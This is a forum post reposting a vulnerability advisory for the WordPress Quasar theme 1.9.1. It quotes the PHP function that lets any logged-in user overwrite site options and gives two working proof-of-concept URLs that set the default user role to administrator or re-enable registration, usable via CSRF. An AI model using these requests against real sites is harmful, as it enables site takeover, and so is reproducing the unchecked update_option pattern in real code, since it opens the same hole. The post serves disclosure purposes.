Aerosol Posted February 3, 2015 Report Posted February 3, 2015 ------------------------------------------------------------------------------WordPress Quasar Theme Previlege Escalation------------------------------------------------------------------------------[-] Theme Link:http://themeforest.net/item/quasar-wordpress-theme-with-animation-builder/6126939?ref=XanderRock[-] Affected Version:Version 1.9.1[-] Vulnerability Description:The vulnerable code is located in the /rock-builder/rock-builder-ui.phpscript:function rock_builder_save_template(){ $data = $_REQUEST['data']; $template = $_REQUEST['template']; $templateName = $template['name']; $templateDBName = $template['database_name']; update_option($templateDBName, $data); $builderReferences = get_option("rock_builder_references",array()); $i = 0; foreach($builderReferences as $ref){ if($ref['database_name'] == $templateDBName){ $builderReferences[$i]['name'] = $templateName; update_option("rock_builder_references",$builderReferences); //echo "FOUND"; break; } $i++; } exit;}add_action("wp_ajax_rockAjax_save_builder_template","rock_builder_save_template");then function rock_builder_save_template can be called by logged in usersand executed which can lead to modifying wordpress settings and adding anew administrator which may cause the site a full take over[-] Proof of Concept:Accessing The Url below with a logged in user will set the default role ofany new registered user as administrator(if you already had a user)http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=administrator&template[database_name]=default_roleAccessing The Url below with a logged in user will allow user registrationif it was disabledthis can be exploited by sending it to a logged in user or administrater(CSRF)http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=1&template[database_name]=users_can_registerSource Quote
